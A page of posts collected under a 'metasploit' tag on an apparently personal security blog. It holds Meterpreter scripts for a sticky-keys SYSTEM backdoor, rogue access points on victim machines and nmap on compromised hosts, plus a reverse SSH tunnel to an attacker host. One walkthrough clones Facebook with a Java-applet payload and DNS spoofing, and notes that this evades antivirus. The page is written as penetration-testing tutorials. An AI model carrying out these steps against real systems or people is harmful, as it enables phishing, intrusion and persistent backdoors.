Tag: metasploit

SSH Tricks And More! Presented By Kyle Young [GR-ISSA] (4-20-12)

by on Jun.03, 2012, under Videos

What was covered in this presentation: SSH basics, Offensive uses of SSH, Defensive uses of SSH, automating SSH through scripting languages, brief history of SSH, setting up a poor man’s VPN, using SSH with IPV6, attacks on SSH and more!

PowerPoint Slides available at:

http://ia601206.us.archive.org/32/items/SshTricksAndMorePresentedByKyleYoung/…

sha1sum: fb8a4132f57c12f6e49beeb18880b2d961d2e37c

Full video for download is available at:

http://ia601206.us.archive.org/1/items/KyleyoungSshTricksandMorevideo/KyleYou…

sha1sum: 3b862e15e9c6664040470034ef4c2f04ce2ad1e5

Part 2: http://youtu.be/h0mzoOsc85s

Part 3: http://youtu.be/ne-H7kGrw8w

Part 4: http://youtu.be/nLSSf8CXWqk

I want to thank the Grand Rapids ISSA chapter for allowing me to put on this presentation back in April.

Leave a Comment :, , , , , , , , , , , , , , , , , , , , , , , , , more...

Meterpreter script – rogueap.rb – Abusing Windows Virtual Wireless NIC Feature

by on Oct.08, 2011, under Meterpreter Scripts, Posts

I found myself inspired by Vivek Ramachandran‘s videos, I thought I would take the honor in creating the simple meterpreter script that basically does what you see in the third installation of the Swse Addendum videos.

When I watched the third video I thought to myself, “This shouldn’t be too difficult to do”. From my perception, I think that Vivek was kind of hinting that he might have wanted to see someone in the info-sec community create a meterpreter script that does what you see in this video. I was glad to do this. 🙂

For penetration testers, this script means that they can now more easily setup rogue wireless access points by utilizing this script, that utilizes the soft ap feature that is implemented into Windows 7 and Windows 2008.

If the victim computers are part of a Windows domain and have wireless NICs, by automating Metasploit with a pass-the-hash attack and using my script, one could essentially automate deploying a series of rogue ap points throughout a domain. This would be kind of like a network worm.

If you’re curious about automating Metasploit, please see:

http://dev.metasploit.com/redmine/projects/framework/repository/revisions/8878/entry/documentation/msfconsole_rc_ruby_example.rc

My script gives the end user the option if they want to install the meterpreter service on the victim computer. I thought that giving this option would be ideal for if the victim computer ends up rebooting. If you were just to deploy the soft AP and run a binding payload, the binding payload most likely wouldn’t survive a reboot.

The script is available here:

http://zitstif.no-ip.org/meterpreter/rogueap.rb

http://zitstif.no-ip.org/meterpreter/rogueap.txt

If you have any issues and you need help, feel free to contact me. Additionally, don’t hesitate to modify the script if you need/want to do so.

2 Comments :, , , , , , , , , , , , , , , , , , , , , , more...

Meterpreter script – deploy_nmap.rb

by on Aug.08, 2011, under Code, Meterpreter Scripts, Posts

Using a ‘trusted’ host that you have compromised as leverage during a pentest, is nearly always advantageous. I personally believe that the steps of pentesting change in a sense, once you have a session on a computer in an internal network from an external computer.

I would revert back to reconnaissance (depending on the circumstances), since the point of view has changed. The hijacked host is “your man on the inside”, and what a better way to give the ‘man on the inside’ some ‘eyes’ by deploying and using nmap!

One means of using nmap through the compromised host includes:

1.) Deploying an openssh server on the victim machine

2.) Setting up an account

3.) Reversing an ssh session like so: ssh -R 2222:localhost:22 attacker@attackersbox.com

4.) Then you would connect back to the victim using a socks5 proxy: ssh -D 9050 victimaccount@localhost -p 2222

5.) Lastly, you would use nmap and proxychains from the attacker’s host to scan hosts internally through a tunnel between you and the victim machine.

Keep in mind that the Metasploit framework has an auxiliary module “auxiliary/scanner/portscan”, which you can use but let me be quite frank, it doesn’t compare to what is known as the ‘king of all port scanners’ nmap. (No offense Metasploit crew.)

This is why I programmed a meterpreter script that downloads the latest stable version of nmap from www.insecure.org and then deploys nmap onto the victim’s machine. You could then use the victim’s machine to do vulnerability scanning with nmap’s scripting engine. (i.e. nmap –script=smb-check-vulns).

The script has a removal feature that will uninstall nmap and winpcap from the victim’s machine. Please e-mail me or comment if you have any questions, concerns or problems with the script.

NOTE: On versions of Microsoft Windows that use the UAC service, you will most likely need to disable or circumvent this service to successfully deploy nmap.  Luckily there is a module with the Metasploit framework that will help you (post/windows/escalate/bypassuac).

http://zitstif.no-ip.org/meterpreter/deploy_nmap.txt

Leave a Comment :, , , , , , , , , , , , , , , , , more...

Meterpreter script – stickykeys.rb

by on Jul.18, 2011, under Code, Meterpreter Scripts, Posts

http://zitstif.no-ip.org/meterpreter/stickykeys.txt

Through the past year or so, I’ve had some ideas for meterpreter scripts floating around in my head that I’ve been meaning to put to use. So this is my first unofficial meterpreter script for the Metasploit Framework.

The purpose of this script is to place a backdoor onto a Windows victim system. What it simply does is, copy cmd.exe over to sethc.exe. The sethc.exe program is the sticky keys program. To activate this program you just have to hit the shift key 5 times and sethc.exe will be executed.

While this can be useful for those who are disabled, there is also an abuse for this feature. If you have copied cmd.exe over to sethc.exe, you can then hit shift 5 times and be provided a shell.

If you’re at a log on prompt and if you have this backdoor placed, when you activate sethc.exe (instead of logging in) you get a shell with SYSTEM level privileges!

This may seem trivial, however if you’re doing a penetration test on a remote Windows system that is running remote desktop, this can be a deadly means for maintaining access. You can then use this as pivoting your way back into the system, even if the original means (say for instance http) is blocked by an IPS and/or firewall.

One truly beautiful facet about this method if you’re an attacker, is that cmd.exe renamed as sethc.exe did not trigger any responses from scanners on www.virustotal.com.

I’m planning on adding more to this script, but I just wanted to get this released for the time being. I also want to state that I just put this idea to use for the Metasploit project, this hack has been around for a while:

http://goo.gl/E40Oj

To install this, simply download the txt file, then change the extension to .rb and throw this file in the framework3/msf3/scripts/meterpreter/ directory.

#Update 7/20/2011

Issue Addressed: Switched all C:\\WINDOWS to %SYSTEMROOT% (Thanks Rod Macpherson )
BUG: On Nokia N900 with Ruby 1.8.7 (arm-linux-eabi), with Metasploit Framework version: svn r13268, I am receiving a compile error message at line 70. (Unexpected ‘)’ )
NOTE: I am not having this issue on Backtrack 5 32bit with Ruby 1.9.2dev (i686-linux)

Leave a Comment :, , , , , , , , , , , , , , more...

Weaponizing the Nokia N900 – Part 3.7 – More goodness and packet injection!

by on Apr.21, 2011, under Code, Posts

Thanks to Shawn Merdinger, from infosecisland for the inspiration and  thanks to many others in the information security community, I’m continuing with my ‘Weaponizing the Nokia N900’ series with another entry.

Firstly, I would like to mention that I’m contemplating on writing a program to automate the process of turning your N900 into a pentester’s device. This is largely due to the fact that the neopwn project seems to have come to a stand still. I have attempted contacting an individual from the neopwn project, however I haven’t had much luck.

In this post I will cover some of the other attacks you can carry out with your N900 as a rogue ap point using dns spoofing and David Kennedy‘s Social Engineering Toolkit. Along with that, I’ll give you information on how to get packet injection working so the aircrack suite is more useful to you.

Rogue AP Goodness:

1.) Download SET to your n900 and take note of this information:

a.) You’ll need to install some additional python modules  such as, python-crypto. Python-crypto is in the repositories if you have the extra repositorise that I mentioned  in an earlier post: http://zitstif.no-ip.org/?p=451

b.) I wasn’t able to find python-pexpect in the repositories, but luckily SET was able to download it and install it for me.

c.) If you’re planning on using metasploit in tandem with SET, you’ll need to do as follows:

ln -s /usr/bin/rub1.8 /usr/bin/ruby

Oddly enough, SET does not do a check for whether or not if you have ruby installed. I would implement something like this some where in the SET project:

http://zitstif.no-ip.org/setfix.txt

2.) See my earlier post on how to setup your n900 as a rogue ap point: http://zitstif.no-ip.org/?p=459 (Keep in mind though we’re going to inject a new step or two.)

3.) After step 4 (in the earlier rogue ap point instructions) load up SET and select number 2 for the website attack vectors section

4.) Select option 1 for the java applet attack method

5.) Now select the site cloner option

6.) Select a website to clone (Hmm anyone up for Facebook?! 😉 )

7.) For the payload, give SET’s own payload a try, it’s pretty powerful and you can even run a keylogger. In addition to that for the moment, this attack bypasses some AV solutions. (The system I tested this on was a fully patched Windows 7 x64 system that has Microsoft Security Essentials up to date, and I was able to get a session without any AV alarms going off.)

8.) Before you fire up ettercap, go to etter.dns and create an entry like this (especially if you’re using the mobilehotspot application)

www.facebook.com     A      10.105.242.1

9.) Now run this:

ettercap -i wlan0 -q -T -p -u // // -P dns_spoof

What I adore about this attack, is the java applet infection method. It’s a great social engineering method for gaining access to victim’s machines. Plus with SET, you don’t need sun-java6-jdk, which doesn’t appear to be available in the n900’s repositories.

I also wanted to note, that I wasn’t able to get the java applet to work against OSX systems or Linux systems. 🙁

Aircrack-ng goodness:

I was able to get packet injection working and was able to successfully use the chop-chop attack on a WEP network to create enough IVs and then crack the WEP key in about 10 minutes.

Please see this blog entry:

http://david.gnedt.eu/blog/wl1251/

Also pay close attention to:

http://david.gnedt.eu/wl1251/README

Be careful about using this driver because it seems to drain battery life quite quickly.

(Speaking of which..)

Additional notes:

One more tip I would like to share with fellow N900 owners on extending battery life is as follows:

-Uninstall applications that eat up a lot of CPU time and run in the background

-Disable your wifi connection if you’re not using it

-Dim the brightness of your screen

-Disable anything you don’t need or aren’t currently using

-Use an application to that allows you to switch between 3G and 2G networks. If you’re just using SMS and calling people, all you need is the 2G network. (In my humble opinion)

That’s all for now. As usual, more to come!

3 Comments :, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , more...

Looking for something?

Use the form below to search the site:

Still not finding what you're looking for? Drop a comment on a post or contact us so we can take care of it!